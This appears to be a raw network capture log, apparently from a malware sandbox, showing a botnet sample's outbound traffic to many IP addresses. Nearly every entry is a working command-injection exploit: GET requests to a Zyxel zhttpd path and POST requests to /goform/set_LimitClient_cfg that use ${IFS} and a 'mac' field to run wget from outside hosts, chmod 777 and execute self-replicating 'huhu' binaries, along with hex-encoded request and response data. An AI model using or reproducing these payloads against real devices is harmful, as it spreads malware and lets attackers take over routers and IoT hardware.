                                              Jan 29, 2024 07:04:07.352412939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8734192.168.2.143861078.226.136.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352447987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8735192.168.2.14487229.37.101.202443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352492094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8736192.168.2.1447488116.214.144.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352549076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8737192.168.2.14438242.35.227.136443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352571964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8738192.168.2.1460542107.215.31.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352601051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8739192.168.2.144259851.26.136.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352627993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8740192.168.2.145279223.172.150.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352658033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8741192.168.2.144529467.8.141.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352705002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8742192.168.2.1445476181.63.97.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352729082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8743192.168.2.144632089.92.3.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352778912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8744192.168.2.1458978129.70.150.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352801085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8745192.168.2.1437170184.91.204.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352854013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8746192.168.2.143618484.95.200.12443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352915049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8747192.168.2.1437826157.66.74.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352941990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8748192.168.2.1436402196.50.197.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.352983952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8749192.168.2.1436178179.106.134.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353038073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8750192.168.2.1440174157.126.103.25443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353080034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8751192.168.2.145292012.184.130.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353110075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8752192.168.2.144832227.62.217.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353152990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8753192.168.2.145451677.40.205.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353178024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8754192.168.2.143487451.160.240.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353230000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8755192.168.2.144817269.40.97.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353256941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8756192.168.2.145723846.110.192.95443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.353292942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8757192.168.2.144920884.39.245.548080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.850022078 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:08.089421988 CET513INHTTP/1.1 400 Bad Request
                                              Content-Type: text/html; charset=us-ascii
                                              Server: Microsoft-HTTPAPI/2.0
                                              Date: Mon, 29 Jan 2024 06:04:09 GMT
                                              Connection: close
                                              Content-Length: 334
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 48 6f 73 74 6e 61 6d 65 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 68 6f 73 74 6e 61 6d 65 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid Hostname</h2><hr><p>HTTP Error 400. The request hostname is invalid.</p></BODY></HTML>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8758192.168.2.1436200208.64.93.188080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:07.985831976 CET236OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8759192.168.2.1451198107.190.229.868080
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.010056019 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:08.878130913 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;
                                              Jan 29, 2024 07:04:09.866087914 CET224OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                              Cookie: user=admin
                                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 34 32 2e 31 38 32 2e 31 32 33 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://45.142.182.123/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm -rf *mpsl*;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8760192.168.2.1446140202.56.165.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363540888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8761192.168.2.144983460.196.59.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363558054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8762192.168.2.145232490.207.104.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363589048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8763192.168.2.1441580208.177.246.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363617897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8764192.168.2.145458068.200.85.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363682032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8765192.168.2.1433364193.247.220.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363706112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8766192.168.2.1447930135.13.39.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363739967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8767192.168.2.1450232119.188.217.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363821030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8768192.168.2.1446578126.222.154.252443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363837004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8769192.168.2.1447248205.101.152.200443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363903999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8770192.168.2.144263082.248.61.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363908052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8771192.168.2.146081269.84.4.114443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.363951921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8772192.168.2.1442796198.21.212.185443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364001989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8773192.168.2.143920036.229.251.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364046097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8774192.168.2.145378441.243.23.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364068031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8775192.168.2.1453486104.24.69.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364101887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8776192.168.2.146004614.57.250.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364135981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8777192.168.2.1451414180.213.126.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364171028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8778192.168.2.1439656219.230.56.227443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364217043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8779192.168.2.1437908207.197.84.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364253044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8780192.168.2.145611671.238.119.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364285946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8781192.168.2.144437879.8.240.144443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.364311934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8782192.168.2.1459236133.75.14.115443
                                              TimestampBytes transferredDirectionData
